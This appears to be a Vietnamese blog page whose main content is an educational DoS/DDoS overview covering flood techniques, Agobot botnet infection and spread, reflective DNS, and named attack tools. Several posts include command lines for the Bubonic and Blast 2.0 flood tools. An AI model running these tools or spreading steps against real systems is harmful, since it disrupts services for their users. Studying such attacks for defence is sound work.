Saturday, June 30, 2012

Mình RIP từ Google và Design lại, có đính kèm PSD cho các bạn (tự PTS nên ai ko thích thì tự design logo khác :D)

Dùng làm Index login cho Diễn đàn (vBulletin) là thích hợp nhất ;)

* Hướng dẫn:

  • Chỉ cần chỉnh lại URL cho phù hợp với Forum của bạn là xong (edit index.htm)

Demo: http://www.GhostClub.info/demo.htm

Ảnh demo:



Download:
http://www.mediafire.com/?u079g0o7ou578vd
Pass Unlock: junookyo

File PSD Logo bạn có thể download tại đây:
http://sinhvienit.net/@forum/threads/205081-index-login-phong-cach-google-full-psd/#1

Share Index login phong cách Google (Full PSD)

By: MIN Software on: 8:10 PM

Friday, June 29, 2012


Trong phần II của bài viết về tấn công DoS và DDoS tôi sẽ trình bày với các bạn nội dung chi tiết về mạng Bot, các dạng mạng Bot và cách tạo ra mạng Botnet. Khi hiểu về mạng Botnet bạn có thể hình dung ra phương thức tấn công DDoS.

Trong phần II này tôi cũng trình bày với các bạn chi tiết các phương thức tấn công DDoS các thực hiện các phương thức tấn công này. Nhưng bài viết này chỉ có tác dụng giúp các bạn hiểu biết sâu về tấn công DDoS mà thôi, các tools giới thiệu chỉ mang tính giới thiệu vì nó là các tools DDoS cũ.
VI. Mạng BOT NET
1. Ý nghĩa của mạng BOT
- Khi sử dụng một Tool tấn công DoS tới một máy chủ đôi khi không gây ảnh hưởng gì cho máy chủ - Giả sử bạn sử dụng tool Ping of Death tới một máy chủ, trong đó máy chủ kết nối với mạng tốc độ 100Mbps bạn kết nối tới máy chủ tốc độ 3Mbps - Vậy tấn công của bạn không có ý nghĩa gì.
- Nhưng bạn hãy tưởng tượng có 1000 người như bạn cùng một lúc tấn công vào máy chủ kia khi đó toàn bộ băng thông của 1000 người cộng lại tối đa đạt 3Gbps và tốc độ kết nối của máy chủ là 100 Mbps vậy kết quả sẽ ra sao các bạn có khả năng tưởng tượng.
- Nhưng tôi đang thử hỏi làm cách nào để có 1000 máy tính kết nối với mạng – tôi đi mua một nghìn chiếc và thuê 1000 thuê bao kết nối - chắc chắn tôi không làm như vậy rồi và cũng không kẻ tân công nào sử dụng phương pháp này cả.
- Kẻ tấn công xây dựng một mạng gồm hàng nghìn máy tính kết Internet (có mạng BOT lên tới 400.000 máy). Vậy làm thể nào chúng có khả năng lợi dụng người kết nối tới Internet để xây dựng mạng BOT trong bài viết này tôi sẽ giới thiệu với các bạn các mạng BOT và cách xây dựng, những Tool xây dựng.
- Khi có trong tay mạng BOT kẻ tấn công sử dụng những tool tấn công đơn giản để tấn công vào một hệ thống máy tính. Dựa vào những truy cập hoàn toàn hợp lệ của hệ thống, cùng một lúc chúng sử dụng một dịch vụ của máy chủ, bạn thử tưởng tượng khi kẻ tấn công có trong tay 400.000 máy chủ và cùng một lúc ra lệnh cho chúng download một file trên trang web của bạn. Và đó chính là DDoS – Distributed Denial of Servcie
- Không có một phương thức chống tấn công DDoS một cách hoàn toàn nhưng trong bài viết này tôi cũng giới thiệu với các bạn những phương pháp phòng chống DDoS khi chúng ta đã hiểu về nó.
2. Mạng BOT
- BOT từ viết tắt của từ RoBOT
- IRCbot – còn được gọi là zombia hay drone.
- Internet Relay Chat (IRC) là một dạng truyền dữ liệu thời gian thực trên Internet. Nó thường được thiết kế sao cho một người có thể nhắn được cho một group và mỗi người có thể giao tiếp với nhau với một kênh khác nhau được gọi là – Channels.
- Đầu tiên BOT kết nối kênh IRC với IRC Server và đợi giao tiếp giữa những người với nhau.
- Kẻ tấn công có thể điều khiển mạng BOT và sử dụng mạng BOT cũng như sử dụng nhằm một mục đích nào đó.
- Nhiều mạng BOT kết nối với nhau người ta gọi là BOTNET – botnet.
3. Mạng Botnet.
- Mạng Botnet bao gồm nhiều máy tính
- Nó được sử dụng cho mục đích tấn công DDoS
- Một mạng Botnet nhỏ có thể chỉ bao gồm 1000 máy tính nhưng bạn thử tưởng tượng mỗi máy tính này kết nối tới Internet tốc độ chỉ là 128Kbps thì mạng Botnet này đã có khả năng tạo băng thông là 1000*128 ~ 100Mbps – Đây là một con số thể hiện băng thông mà khó một nhà Hosting nào có thể share cho mỗi trang web của mình.
4. Mục đích sử dụng mạng Botnets
- Tấn công Distributed Denial-of-Service - DDoS
+ Botnet được sử dụng cho tấn công DDoS
- Spamming
+ Mở một SOCKS v4/v5 proxy server cho việc Spamming
- Sniffing traffic
+ Bot cũng có thể sử dụng các gói tin nó sniffer (tóm được các giao tiếp trên mạng) sau khi tóm được các gói tin nó cố gắng giải mã gói tin để lấy được các nội dung có ý nghĩa như tài khoản ngân hàng và nhiều thông tin có giá trị khác của người sử dụng.
- Keylogging
+ Với sự trợ giúp của Keylogger rất nhiều thông tin nhạy cảm của người dùng có thể sẽ bị kẻ tấn công khai thác như tài khoản trên e-banking, cũng như nhiều tài khoản khác.
- Cài đặt và lây nhiễm chương trình độc hại
+ Botnet có thể sử dụng để tạo ra mạng những mạng BOT mới.
- Cài đặt những quảng cáo Popup
+ Tự động bật ra những quảng cáo không mong muốn với người sử dụng.
- Google Adsense abuse
+ Tự động thay đổi các kết quả tìm kiếm hiển thị mỗi khi người dùng sử dụng dịch vụ tìm kiểm của Google, khi thay đổi kết quả nó sẽ lừa người dùng kích vào những trang web nguy hiểm.
- Tấn công vào IRC Chat Networks
+ Nó được gọi là clone attack
- Phishing
+ Mạng botnet còn được sử dụng để phishing mail nhằm lấy các thông tin nhạy cảm của người dùng.
5. Các dạng của mạng BOT.
Agobot/Phatbot/Forbot/XtremBot
- Đây là những bot được viết bằng C++ trên nền tảng Cross-platform và mã nguồn được tìm trên GPL. Agobot được viết bởi Ago nick name được người ta biết đến là Wonk, một thanh niên trẻ người Đức – đã bị bắt hồi tháng 5 năm 2004 với tội danh về tội phạm máy tính.
- Agobot có khả năng sử dụng NTFS Alternate Data Stream (ADS) và như một loại Rootkit nhằm ẩn các tiến trình đang chạy trên hệ thống
SDBot/Rbot/UrBot/UrXbot
- SDBot được viết bằng ngồn ngữ C và cũng được public bởi GPL. Nó đươc coi như là tiền thân của Rbot, RxBot, UrBot, UrXBot, JrBot
mIRC-Based Bots – GT-Bots
- GT được viết tắt tư fhai từ Global Threat và tên thường được sử dụng cho tất cả các mIRC-scripted bots. Nó có khả năng sử dụng phần mềm IM là mIRC để thiết lập một số script và một số đoạn mã khác.
6. Các bước xây dựng mạng BotNet? Cách phân tích mạng Bot.
Để hiểu hơn về xây dựng hệ thống mạng BotNet chúng ta nghiên cứu từ cách lây nhiễm vào một máy tính, cách tạo ra một mạng Bot và dùng mạng Bot này tấn công vào một đích nào đó của mạng Botnet được tạo ra từ Agobot’s.
Bước 1: Cách lây nhiễm vào máy tính.
- Đầu tiên kẻ tấn công lừa cho người dùng chạy file "chess.exe", một Agobot thường copy chúng vào hệ thống và sẽ thêm các thông số trong Registry để đảm bảo sẽ chạy cùng với hệ thống khi khởi động. Trong Registry có các vị trí cho các ứng dụng chạy lúc khởi động tại.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run Services
Bước 2: Cách lây lan và xây dựng tạo mạng BOTNET
- Sau khi trong hệ thống mạng có một máy tính bị nhiễm Agobot, nó sẽ tự động tìm kiếm các máy tính khác trong hệ thống và lây nhiễm sử dụng các lỗ hổng trong tài nguyên được chia sẻ trong hệ thống mạng.
- Chúng thường cố gắng kết nối tới các dữ liệu share mặc định dành cho các ứng dụng quản trị (administrator or administrative) ví dụ như: C$, D$, E$ và print$ bằng cách đoán usernames và password để có thể truy cập được vào một hệ thống khác và lây nhiễm.
- Agobot có thể lây lan rất nhanh bởi chúng có khả năng tận dụng các điểm yếu trong hệ điều hành Windows, hay các ứng dụng, các dịch vụ chạy trên hệ thống.
Bước 3: Kết nối vào IRC.
- Bước tiếp theo của Agobot sẽ tạo ra một IRC-Controlled Backdoor để mở các yếu tố cần thiết, và kết nối tới mạng Botnet thông qua IRC-Controll, sau khi kết nối nó sẽ mở những dịch vụ cần thiết để khi có yêu cầu chúng sẽ được điều khiển bởi kẻ tấn công thông qua kênh giao tiếp IRC.
Bước 4: Điều khiển tấn công từ mạng BotNet.
- Kẻ tấn công điều khiển các máy trong mạng Agobot download những file .exe về chạy trên máy.
- Lấy toàn bộ thông tin liên quan và cần thiết trên hệ thống mà kẻ tấn công muốn.
- Chạy những file khác trên hệ thống đáp ứng yêu cầu của kẻ tấn công.
- Chạy những chương trình DDoS tấn công hệ thống khác.
7. Sơ đồ cách hệ thống bị lây nhiễm và sử dụng Agobot.




VII. Các tools tấn công DDoS
1. Nuclear Bot.
- Nuclear Bot là một tool cực mạnh "Multi Advanced IRC BOT" có thể sử dụng để Floods, Managing, Utilities, Spread, IRC Related, tấn công DDoS và nhiều mục đích khác.



VIII. Tấn công DDoS



Trên Internet tấn công Distributed Denial of Service là một dạng tấn công từ nhiều máy tính tới một đích, nó gây ra từ chối các yêu cầu hợp lệ của các user bình thường. Bằng cách tạo ra những gói tin cực nhiều đến một đích cụ thể, nó có thể gây tình trạng tương tự như hệ thống bị shutdown.
2. Các đặc tính của tấn công DDoS.
- Nó được tấn công từ một hệ thống các máy tính cực lớn trên Internet, và thường dựa vào các dịch vụ có sẵn trên các máy tính trong mạng botnet
- Các dịch vụ tấn công được điều khiển từ những "primary victim" trong khi các máy tính bị chiếm quyền sử dụng trong mạng Bot được sử dụng để tấn công thường được gọi là "secondary victims".
- Là dạng tấn công rất khó có thể phát hiện bởi tấn công này được sinh ra từ nhiều địa chỉ IP trên Internet.
- Nếu một địa chỉ IP tấn công một công ty, nó có thể được chặn bởi Firewall. Nếu nó từ 30.000 địa chỉ IP khác, thì điều này là vô cùng khó khăn.
- Thủ phạm có thể gây nhiều ảnh hưởng bởi tấn công từ chối dịch vụ DoS, và điều này càng nguy hiểm hơn khi chúng sử dụng một hệ thống mạng Bot trên internet thực hiện tấn công DoS và đó được gọi là tấn công DDoS.
3. Tấn công DDoS không thể ngăn chặn hoàn toàn.
- Các dạng tấn công DDoS thực hiện tìm kiếm các lỗ hổng bảo mật trên các máy tính kết nối tới Internet và khai thác các lỗ hổng bảo mật để xây dựng mạng Botnet gồm nhiều máy tính kết nối tới Internet.
- Một tấn công DDoS được thực hiện sẽ rất khó để ngăn chặn hoàn toàn.
- Những gói tin đến Firewall có thể chặn lại, nhưng hầu hết chúng đều đến từ những địa chỉ IP chưa có trong các Access Rule của Firewall và là những gói tin hoàn toàn hợp lệ.
- Nếu địa chỉ nguồn của gói tin có thể bị giả mạo, sau khi bạn không nhận được sự phản hồi từ những địa chỉ nguồn thật thì bạn cần phải thực hiện cấm giao tiếp với địa chỉ nguồn đó.
- Tuy nhiên một mạng Botnet bao gồm từ hàng nghìn tới vài trăm nghìn địa chỉ IP trên Internet và điều đó là vô cùng khó khăn để ngăn chặn tấn công.
4. Kẻ tấn công khôn ngoan.
Giờ đây không một kẻ tấn công nào sử dụng luôn địa chỉ IP để điều khiển mạng Botnet tấn công tới đích, mà chúng thường sử dụng một đối tượng trung gian dưới đây là những mô hình tấn công DDoS
a. Agent Handler Model
Kẻ tấn công sử dụng các handler để điều khiển tấn công



b. Tấn công DDoS dựa trên nền tảng IRC
Kẻ tấn công sử dụng các mạng IRC để điều khiển, khuyếch đại và quản lý kết nối với các máy tính trong mạng Botnet.



IX. Phân loại tấn công DDoS
- Tấn công gây hết băng thông truy cập tới máy chủ.
+ Flood attack
+ UDP và ICMP Flood (flood – gây ngập lụt)
- Tấn công khuếch đại các giao tiếp
+ Smurf and Fraggle attack
Tấn công DDoS vào Yahoo.com năm 2000



Sơ đồ phân loại tấn công DDoS



Sơ đồ tấn công DDoS ở dạng Khuếch đại giao tiếp.
Như các bạn biết tấn công Smurf khi sử dụng sẽ Ping đến địa chỉ Broadcast của một mạng nào đó mà địa chỉ nguồn chính là địa chỉ của máy cần tấn công, khi đó toàn bộ các gói Reply sẽ được chuyển tới địa chỉ IP của máy tính bị tấn công.



X. Tấn công Reflective DNS (reflective - phản chiếu).
a. Các vấn đề liên quan tới tấn công Reflective DNS
- Một Hacker có thể sử dụng mạng botnet để gửi rất nhiều yêu cầu tới máy chủ DNS.
- Những yêu cầu sẽ làm tràn băng thông mạng của các máy chủ DNS,
- Việc phòng chống dạng tấn công này có thể dùng Firewall ngăn cấm những giao tiếp từ các máy tính được phát hiện ra.
- Nhưng việc cấm các giao tiếp từ DNS Server sẽ có nhiều vấn đề lớn. Một DNS Server có nhiệm vụ rất quan trọng trên Internet.
- Việc cấm các giao tiếp DNS đồng nghĩa với việc cấm người dùng bình thường gửi mail và truy cập Website.
- Một yêu cầu về DNS thường chiếm bằng 1/73 thời gian của gói tin trả lời trên máy chủ. Dựa vào yếu tố này nếu dùng một Tools chuyên nghiệp để làm tăng các yêu cầu tới máy chủ DNS sẽ khiến máy chủ DNS bị quá tải và không thể đáp ứng cho các người dùng bình thường được nữa.
b. Tool tấn công Reflective DNS – ihateperl.pl
- ihateperl.pl là chương trình rất nhỏ, rất hiệu quả, dựa trên kiểu tấn công DNS-Reflective
- Nó sử dụng một danh sách các máy chủ DNS để làm tràn hệ thống mạng với các gói yêu cầu Name Resolution.
- Bằng một ví dụ nó có thể sử dụng google.com để resole gửi tới máy chủ và có thể đổi tên domain đó thành VnExperts hay bất kỳ một trang web nào mà kẻ tấn công muôn.
- Để sử dụng công cụ này, rất đơn giản bạn tạo ra một danh sách các máy chủ DNS, chuyển cho địa chỉ IP của máy cá nhân và thiết lập số lượng các giao tiếp.
XI. Các tools sử dụng để tấn công DDoS.
Trong toàn bộ các tools tôi giới thiệu trong bài viết này hầu hết là các tools cũ và không hiệu quả, và chỉ mang tính chất sư phạm để các bạn có thể hiểu về dạng tấn công DDoS hơn mà thôi. Dưới đây là các Tools tấn công DDoS.
- Trinoo - Tribe flood Network (TFN) - TFN2K - Stacheldraht - Shaft
- Trinity - Knight - Mstream - Kaiten
Các tools này bạn hoàn toàn có thể Download miễn phí trên Internet và lưu ý là chỉ để thử đây là các tools yếu và chỉ mang tính Demo về tấn công DdoS mà thôi.
Theo VnExperts
 =====
Phần 1: http://junookyo.blogspot.com/2012/06/dos-va-ddos-toan-tap-phan-i.html

DoS và DDoS toàn tập – Phần II

By: MIN Software on: 11:09 AM

DoS và DDoS là một trong những dạng tấn công nguy hiểm nhất đối với một hệ thống mạng. Bài viết này không muốn các bạn dựa vào các tools trong này để tấn công, mục đích trình bày để các bạn hiểu về kiểu tấn công này, và có những giải pháp phòng chống.

Trong bài viết này tôi sẽ trình bày với các bạn chi tiết về định nghĩa, các dạng tấn công DoS và DDoS, cùng hàng loạt các kiến thức liên quan được tổng hợp. DoS và DDoS là một trong những dạng tấn công nguy hiểm nhất đối với một hệ thống mạng. Bài viết này tôi không muốn các bạn dựa vào các tools trong này để tấn công, mục đích trình bày để các bạn hiểu về kiểu tấn công này, và có những giải pháp phòng chống.

1. Lịch sử các cuộc tấn công DoS và DDoS
2. Định nghĩa về: Denial of Service Attack
3. Các dạng tấn công DoS
4. Các tool tấn công DoS
5. Mạng BOT net
6. Tấn công DDoS
7. Phân loại tấn công DDoS
8. Các tools tấn công DDoS
9. Sâu máy tính (worms) trong tấn công DDoS
I. Lịch sử của tấn công DoS
1. Mục tiêu
- Mục tiêu các cuộc tấn công thường vào các trang web lớn và các tổ chức thương mại điện tử trên Internet.
2. Các cuộc tấn công.
- Vào ngày 15 tháng 8 năm 2003, Microsoft đã chịu đợt tấn công DoS cực mạnh và làm gián đoạn websites trong vòng 2 giờ.
- Vào lúc 15:09 giờ GMT ngày 27 tháng 3 năm 2003: toàn bộ phiên bản tiếng anh của website Al-Jazeera bị tấn công làm gián đoạn trong nhiều giờ
II. Định nghĩa về tấn công DoS
Tấn công DoS là kiểu tấn công vô cùng nguy hiểm, để hiểu được nó ta cần phải lắm rõ định nghĩa của tấn công DoS và các dạng tấn công DoS.
- Tấn công DoS là một kiểu tấn công mà một người làm cho một hệ thống không thể sử dụng, hoặc làm cho hệ thống đó chậm đi một cách đáng kể với người dùng bình thường, bằng cách làm quá tải tài nguyên của hệ thống.
- Nếu kẻ tấn công không có khả năng thâm nhập được vào hệ thống, thì chúng cố gắng tìm cách làm cho hệ thống đó sụp đổ và không có khả năng phục vụ người dùng bình thường đó là tấn công Denial of Service (DoS).
Mặc dù tấn công DoS không có khả năng truy cập vào dữ liệu thực của hệ thống nhưng nó có thể làm gián đoạn các dịch vụ mà hệ thống đó cung cấp. Như định nghĩa trên DoS khi tấn công vào một hệ thống sẽ khai thác những cái yếu nhất của hệ thống để tấn công, những mục đích của tấn công DoS:
1. Các mục đích của tấn công DoS
- Cố gắng chiếm băng thông mạng và làm hệ thống mạng bị ngập (flood), khi đó hệ thống mạng sẽ không có khả năng đáp ứng những dịch vụ khác cho người dùng bình thường.
- Cố gắng làm ngắt kết nối giữa hai máy, và ngăn chặn quá trình truy cập vào dịch vụ.
- Cố gắng ngăn chặn những người dùng cụ thể vào một dịch vụ nào đó
- Cố gắng ngăn chặn các dịch vụ không cho người khác có khả năng truy cập vào.
- Khi tấn công DoS xảy ra người dùng có cảm giác khi truy cập vào dịch vụ đó như bị:
+ Disable Network - Tắt mạng
+ Disable Organization - Tổ chức không hoạt động
+ Financial Loss – Tài chính bị mất
2. Mục tiêu mà kẻ tấn công thường sử dụng tấn công DoS
Như chúng ta biết ở bên trên tấn công DoS xảy ra khi kẻ tấn công sử dụng hết tài nguyên của hệ thống và hệ thống không thể đáp ứng cho người dùng bình thường được vậy các tài nguyên chúng thường sử dụng để tấn công là gì:
- Tạo ra sự khan hiếm, những giới hạn và không đổi mới tài nguyên
- Băng thông của hệ thống mạng (Network Bandwidth), bộ nhớ, ổ đĩa, và CPU Time hay cấu trúc dữ liệu đều là mục tiêu của tấn công DoS.
- Tấn công vào hệ thống khác phục vụ cho mạng máy tính như: hệ thống điều hoà, hệ thống điện, hệt hống làm mát và nhiều tài nguyên khác của doanh nghiệp. Bạn thử tưởng tượng khi nguồn điện vào máy chủ web bị ngắt thì người dùng có thể truy cập vào máy chủ đó không.
- Phá hoại hoặc thay đổi các thông tin cấu hình.
- Phá hoại tầng vật lý hoặc các thiết bị mạng như nguồn điện, điều hoà…
III. Các dạng tấn công
Tấn công Denial of Service chia ra làm hai loại tấn công
- Tấn công DoS: Tấn công từ một cá thể, hay tập hợp các cá thể.
- Tấn công DDoS: Đây là sự tấn công từ một mạng máy tính được thiết kế để tấn công tới một đích cụ thể nào đó.
1. Các dạng tấn công DoS
- Smurf
- Buffer Overflow Attack
- Ping of Death
- Teardrop
- SYN Attack
a. Tấn công Smurf
- Là thủ phạm sinh ra cực nhiều giao tiếp ICMP (ping) tới địa chỉ Broadcast của nhiều mạng với địa chỉ nguồn là mục tiêu cần tấn công.
* Chúng ta cần lưu ý là: Khi ping tới một địa chỉ là quá trình hai chiều – Khi máy A ping tới máy B máy B reply lại hoàn tất quá trình. Khi tôi ping tới địa chỉ Broadcast của mạng nào đó thì toàn bộ các máy tính trong mạng đó sẽ Reply lại tôi. Nhưng giờ tôi thay đổi địa chỉ nguồn, thay địa chỉ nguồn là máy C và tôi ping tới địa chỉ Broadcast của một mạng nào đó, thì toàn bộ các máy tính trong mạng đó sẽ reply lại vào máy C chứ không phải tôi và đó là tấn công Smurf.
- Kết quả đích tấn công sẽ phải chịu nhận một đợt Reply gói ICMP cực lớn và làm cho mạng bị dớt hoặc bị chậm lại không có khả năng đáp ứng các dịch vụ khác.
- Quá trình này được khuyếch đại khi có luồng ping reply từ một mạng được kết nối với nhau (mạng BOT).
- tấn công Fraggle, chúng sử dụng UDP echo và tương tự như tấn công Smurf.




Hình hiển thị tấn công DoS - dạng tấn công Smurf sử dụng gói ICMP làm ngập các giao tiếp khác.
b. Tấn công Buffer overflow.
- Buffer Overflow xảy ra tại bất kỳ thời điểm nào có chương trình ghi lượng thông tin lớn hơn dung lượng của bộ nhớ đệm trong bộ nhớ.
- Kẻ tấn công có thể ghi đè lên dữ liệu và điều khiển chạy các chương trình và đánh cắp quyền điều khiển của một số chương trình nhằm thực thi các đoạn mã nguy hiểm. - Tấn công Buffer Overflow tôi đã trình bày cách khai thác lỗi này trong bài viết trước về hacking windows cũng trên trang VnExperts - Training CCNA, CCNP, CCSP, MCSA, MCSE, MCITP, Linux+, Security+, CEH.
- Quá trình gửi một bức thư điện tử mà file đính kèm dài quá 256 ký tự có thể sẽ xảy ra quá trình tràn bộ nhớ đệm.
c. Tấn công Ping of Death




- Kẻ tấn công gửi những gói tin IP lớn hơn số lương bytes cho phép của tin IP là 65.536 bytes.
- Quá trình chia nhỏ gói tin IP thành những phần nhỏ được thực hiện ở layer II.
- Quá trình chia nhỏ có thể thực hiện với gói IP lớn hơn 65.536 bytes. Nhưng hệ điều hành không thể nhận biết được độ lớn của gói tin này và sẽ bị khởi động lại, hay đơn giản là sẽ bị gián đoạn giao tiếp.
- Để nhận biết kẻ tấn công gửi gói tin lớn hơn gói tin cho phép thì tương đối dễ dàng.
d. Tấn công Teardrop
- Gói tin IP rất lớn khi đến Router sẽ bị chia nhỏ làm nhiều phần nhỏ.
- Kẻ tấn công sử dụng sử dụng gói IP với các thông số rất khó hiểu để chia ra các phần nhỏ (fragment).
- Nếu hệ điều hành nhận được các gói tin đã được chia nhỏ và không hiểu được, hệ thống cố gắng build lại gói tin và điều đó chiếm một phần tài nguyên hệ thống, nếu quá trình đó liên tục xảy ra hệ thống không còn tài nguyên cho các ứng dụng khác, phục vụ các user khác.
e. Tấn công SYN


- Kẻ tấn công gửi các yêu cầu (request ảo) TCP SYN tới máy chủ bị tấn công. Để xử lý lượng gói tin SYN này hệ thống cần tốn một lượng bộ nhớ cho kết nối.
- Khi có rất nhiều gói SYN ảo tới máy chủ và chiếm hết các yêu cầu xử lý của máy chủ. Một người dùng bình thường kết nối tới máy chủ ban đầu thực hiện Request TCP SYN và lúc này máy chủ không còn khả năng đáp lại - kết nối không được thực hiện.
- Đây là kiểu tấn công mà kẻ tấn công lợi dụng quá trình giao tiếp của TCP theo – Three-way.
- Các đoạn mã nguy hiểm có khả năng sinh ra một số lượng cực lớn các gói TCP SYN tới máy chủ bị tấn công, địa chỉ IP nguồn của gói tin đã bị thay đổi và đó chính là tấn công DoS.
- Hình bên trên thể hiện các giao tiếp bình thường với máy chủ và bên dưới thế hiện khi máy chủ bị tấn công gói SYN đến sẽ rất nhiều trong khi đó khả năng trả lời của máy chủ lại có hạn và khi đó máy chủ sẽ từ chối các truy cập hợp pháp.
- Quá trình TCP Three-way handshake được thực hiện: Khi máy A muốn giao tiếp với máy B. (1) máy A bắn ra một gói TCP SYN tới máy B – (2) máy B khi nhận được gói SYN từ A sẽ gửi lại máy A gói ACK đồng ý kết nối – (3) máy A gửi lại máy B gói ACK và bắt đầu các giao tiếp dữ liệu.
- Máy A và máy B sẽ dữ kết nối ít nhất là 75 giây, sau đó lại thực hiện một quá trình TCP Three-way handshake lần nữa để thực hiện phiên kết nối tiếp theo để trao đổi dữ liệu.
- Thật không may kẻ tấn công đã lợi dụng kẽ hở này để thực hiện hành vi tấn công nhằm sử dụng hết tài nguyên của hệ thống bằng cách giảm thời gian yêu cầu Three-way handshake xuống rất nhỏ và không gửi lại gói ACK, cứ bắn gói SYN ra liên tục trong một thời gian nhất định và không bao giờ trả lời lại gói SYN&ACK từ máy bị tấn công.
- Với nguyên tắc chỉ chấp nhận gói SYN từ một máy tới hệ thống sau mỗi 75 giây nếu địa chỉ IP nào vi phạm sẽ chuyển vào Rule deny access sẽ ngăn cản tấn công này.
IV. Các công cụ tấn công DoS
- Jolt2
- Bubonic.c
- Land and LaTierra
- Targa
- Blast20
- Nemesy
- Panther2
- Crazy Pinger
- Some Trouble
- UDP Flood
- FSMax
1. Tools DoS – Jolt2


- Cho phép kẻ tấn từ chối dịch vụ (DoS) lên các hệ thống trên nền tảng Windows
- Nó là nguyên nhân khiên máy chủ bị tấn công có CPU luôn hoạt động ở mức độ 100%, CPU không thể xử lý các dịch vụ khác.
- Không phải trên nền tảng Windows như Cisco Router và một số loại Router khác cũng có thể bị lỗ hổng bảo mật này và bị tools này tấn công.
2. Tools DoS: Bubonic.c
- Bubonic.c là một tools DoS dựa vào các lỗ hổng bảo mật trên Windows 2000
- Nó hoạt động bằng cách ngẫu nhiên gửi các gói tin TCP với các thiết lập ngẫu nhiên làm cho máy chủ tốn rất nhiều tài nguyên để xử lý vấn đề này, và từ đó sẽ xuất hiện những lỗ hổng bảo mật.
- Sử dụng bubonic.c bằng cách gõ câu lệnh: bubonic 12.23.23.2 10.0.0.1 100



3. Tools DoS: Land and LaTierra
- Giả mạo địa chỉ IP được kết hợp với quá trình mở các kết nối giữa hai máy tính.
- Cả hai địa chỉ IP, địa chỉ nguồn (source) và địa chỉ IP đích, được chỉnh sửa thành một địa chỉ của IP đích khi đó kết nối giữa máy A và máy B đang được thực hiện nếu có tấn công này xảy ra thì kết nối giữa hai máy A và B sẽ bị ngắt kết nối.
- Kết quả này do địa chỉ IP nguồn và địa chỉ IP đích của gói tin giống nhau và gói tin không thể đi đến đích cần đến.
4. Tools DoS: Targa
- Targa là một chương chình có thể sử dụng 8 dạng tấn công DoS khác nhau.
- Nó được coi như một bộ hướng dẫn tích hợp toàn bộ các ảnh hưởng của DoS và thường là các phiên bản của Rootkit.
- Kẻ tấn công sử dụng một trong các phương thức tấn công cụ thể tới một hệ thống bao giờ đạt được mục đích thì thôi.
- Targa là một chương trình đầy sức mạnh và nó có khả năng tạo ra một sự nguy hiểm rất lớn cho hệ thống mạng của một công ty.
5. Tools DoS Blast 2.0
- Blast rất nhỏ, là một công cụ dùng để kiểm tra khả năng của dịch vụ TCP nó có khả năng tạo ra một lưu lượng rất lớn gói TCP và có thể sẽ gay nguy hiểm cho một hệ thống mạng với các server yếu.
- Dưới đây là cách sử dụng để tấn công HTTP Server sử dụng Blast2.0
+ Blast 192.168.1.219 80 40 50 /b "GET /some" /e "url/ HTTP/1.0" /nr /dr /v
- Tấn công máy chủ POP
+ Blast 192.168.1.219 110 15 20 /b "user te" /e "d" /v
6. Tools DoS – Nemesys




- Đây là một chương trình sinh ra những gói tin ngẫu nhiên như (protocol, port, etc. size, …)
- Dựa vào chương trình này kẻ tấn công có thể chạy các đoạn mã nguy hiểm vào máy tính không được bảo mật.
7. Tool DoS – Panther2.




- Tấn công từ chối dịch vụ dựa trên nền tảng UDP Attack được thiết kế dành riêng cho kết nối 28.8 – 56 Kbps.
- Nó có khả năng chiếm toàn bộ băng thông của kết nối này.
- Nó có khả năng chiếm băng thông mạng bằng nhiều phương pháp ví như thực hiện quá trình Ping cực nhanh và có thể gây ra tấn công DoS
8. Tool DoS – Crazy Pinger
- Công cụ này có khả năng gửi những gói ICPM lớn tới một hệ thống mạng từ xa.



9. Tool DoS – Some Trouble




- SomeTrouble 1.0 là một chương trình gây nghẽn hệ thống mạng
- SomeTrouble là một chương trình rất đơn giản với ba thành phần
+ Mail Bomb (tự có khả năng Resole Name với địa chỉ mail có)
+ ICQ Bomb
+ Net Send Flood
10. DoS Tools – UDP Flood




- UDPFlood là một chương trình gửi các gói tin UDP
- Nó gửi ra ngoài những gói tin UDP tới một địac hỉ IP và port không cố định
- Gói tin có khả năng là một đoạn mã văn bản hay một số lượng dữ liệu được sinh ngẫu nhiên hay từ một file.
- Được sử dụng để kiểm tra khả năng đáp ững của Server
11. Tools DoS – FSMAX




- Kiểm tra hiệu năng đáp ứng của máy chủ.
- Nó tạo ra một file sau đó chạy trên Server nhiều lần lặp đi lặp lại một lúc.
- Tác dụng của tools này là tìm cách tấn công làm chàn bộ nhớ đệm và tấn công DoS tới máy chủ.
V. Kết luận phần I.
- Khi sử dụng một Tool tấn công DoS tới một máy chủ đôi khi không gây ảnh hưởng gì cho máy chủ - Giả sử bạn sử dụng tool Ping of Death tới một máy chủ, trong đó máy chủ kết nối với mạng tốc độ 100Mbps bạn kết nối tới máy chủ tốc độ 3Mbps - Vậy tấn công của bạn không có ý nghĩa gì.
- Nhưng bạn hãy tưởng tượng có 1000 người như bạn cùng một lúc tấn công vào máy chủ kia khi đó toàn bộ băng thông của 1000 người cộng lại tối đa đạt 3Gbps và tốc độ kết nối của máy chủ là 100 Mbps vậy kết quả sẽ ra sao các bạn có khả năng tưởng tượng.
- Trong phần II của loạt bài viết tôi sẽ trình bày với các bạn những nội dung về định nghĩa BOT, BOTNET, cách xây dựng, cách sử dụng các BOTNET từ đó chúng ta hiểu cách hoạt động và tìm ra những giải pháp để chống tấn công DDoS một cách hiệu quả nhất.
Theo VnExperts

======
Phần 2: http://junookyo.blogspot.com/2012/06/dos-va-ddos-toan-tap-phan-ii.html

DoS và DDoS toàn tập - Phần I

By: MIN Software on: 11:08 AM
Thường thì việc lưu trữ các file js tại các host free như 110mb tuy tốc độ nhanh nhưng không ổn định.Hôm nay mình xin giới thiệu với các bạn cách dùng GC(Google Code) và GS(Google Site)để làm nơi lưu trữ file js
    Google Code là một trang web của Google trong đó tập trung các nhà phát triển các dự án phần mềm mã nguồn mở được hỗ trợ bởi Google. Trang có rất nhiều mã nguồn phần mềm và danh sách các dịch vụ có hỗ trợ các API công cộng để phục vụ cho việc phát triển các phần mềm hỗ trợ khác. (Wikipedia).

Các bước thực hiện:

a. Đăng ký tài khoản Google (gmail, google adsense,….)


b. Đăng nhập Google Code  

c. Nhấn vào mục Creat a new project

d. Điền vào form đăng ký.
Ô Version control system và Source code license thì tùy bạn lựa chọn. Dùng cho nhu cầu cá nhân thì không cần quan tâm.

